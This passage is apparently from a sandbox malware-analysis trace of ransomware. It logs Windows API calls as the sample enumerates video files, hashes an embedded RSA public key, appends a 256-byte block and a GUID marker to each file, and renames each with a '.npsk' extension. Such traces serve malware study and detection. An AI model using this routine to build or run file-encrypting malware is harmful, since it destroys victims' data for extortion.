KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.901] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.902] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.902] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.903] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.903] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.903] GetLastError () returned 0x0 [0215.903] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.903] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.903] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.903] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.903] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.903] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.904] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc5b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.904] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.904] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.904] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.904] CloseHandle (hObject=0x61c) returned 1 [0215.907] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\60CV9tu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\60cv9tu.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\60CV9tu.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\60cv9tu.mp4.npsk")) returned 1 [0215.911] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2b80710, ftCreationTime.dwHighDateTime=0x1d5e622, ftLastAccessTime.dwLowDateTime=0xab43f30, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xab43f30, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0xd3af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ViEfW bQcX6a_Wdjr.flv", cAlternateFileName="7VIEFW~1.FLV")) returned 1 [0215.911] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ViEfW bQcX6a_Wdjr.flv") returned=".flv" [0215.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ViEfW bQcX6a_Wdjr.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7viefw bqcx6a_wdjr.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.912] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=54191) returned 1 [0215.912] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.914] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd389, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.914] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.915] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd3af, lpOverlapped=0x0) returned 1 [0215.916] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.916] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.916] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.916] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.917] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.917] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.917] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.918] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.918] GetLastError () returned 0x0 [0215.918] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.918] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.918] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.918] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.918] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.918] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.919] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd3af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.919] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.919] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.919] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.919] CloseHandle (hObject=0x61c) returned 1 [0215.923] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ViEfW bQcX6a_Wdjr.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7viefw bqcx6a_wdjr.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ViEfW bQcX6a_Wdjr.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7viefw bqcx6a_wdjr.flv.npsk")) returned 1 [0215.925] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c281200, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xc5a0d0f0, ftLastAccessTime.dwHighDateTime=0x1d5de6d, ftLastWriteTime.dwLowDateTime=0xc5a0d0f0, ftLastWriteTime.dwHighDateTime=0x1d5de6d, nFileSizeHigh=0x0, nFileSizeLow=0x7a0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9OvK4rr7kHk_S_.swf", cAlternateFileName="9OVK4R~1.SWF")) returned 1 [0215.925] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9OvK4rr7kHk_S_.swf") returned=".swf" [0215.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9OvK4rr7kHk_S_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ovk4rr7khk_s_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.926] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=31243) returned 1 [0215.926] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.928] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x79e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.928] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.950] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7a0b, lpOverlapped=0x0) returned 1 [0215.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.951] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.953] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.953] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.953] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.953] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.953] GetLastError () returned 0x0 [0215.953] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.953] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.953] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.953] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.953] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.953] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.954] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7a0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.954] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.954] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.954] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.954] CloseHandle (hObject=0x61c) returned 1 [0215.956] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9OvK4rr7kHk_S_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ovk4rr7khk_s_.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9OvK4rr7kHk_S_.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ovk4rr7khk_s_.swf.npsk")) returned 1 [0215.958] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb112640, ftCreationTime.dwHighDateTime=0x1d5e618, ftLastAccessTime.dwLowDateTime=0x6a7b2410, ftLastAccessTime.dwHighDateTime=0x1d5dfd9, ftLastWriteTime.dwLowDateTime=0x6a7b2410, ftLastWriteTime.dwHighDateTime=0x1d5dfd9, nFileSizeHigh=0x0, nFileSizeLow=0x12b45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AHFvMZk2Q_LNJvf.swf", cAlternateFileName="AHFVMZ~1.SWF")) returned 1 [0215.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AHFvMZk2Q_LNJvf.swf") returned=".swf" [0215.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AHFvMZk2Q_LNJvf.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ahfvmzk2q_lnjvf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.958] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=76613) returned 1 [0215.958] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.960] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12b1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.960] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.962] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x12b45, lpOverlapped=0x0) returned 1 [0215.963] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.963] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.963] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.963] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.964] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.964] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.964] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.965] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.965] GetLastError () returned 0x0 [0215.965] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.965] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.965] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.965] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.965] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.965] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.966] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12b45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.966] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.966] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.966] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.967] CloseHandle (hObject=0x61c) returned 1 [0215.969] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AHFvMZk2Q_LNJvf.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ahfvmzk2q_lnjvf.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AHFvMZk2Q_LNJvf.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ahfvmzk2q_lnjvf.swf.npsk")) returned 1 [0215.970] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3309d7b0, 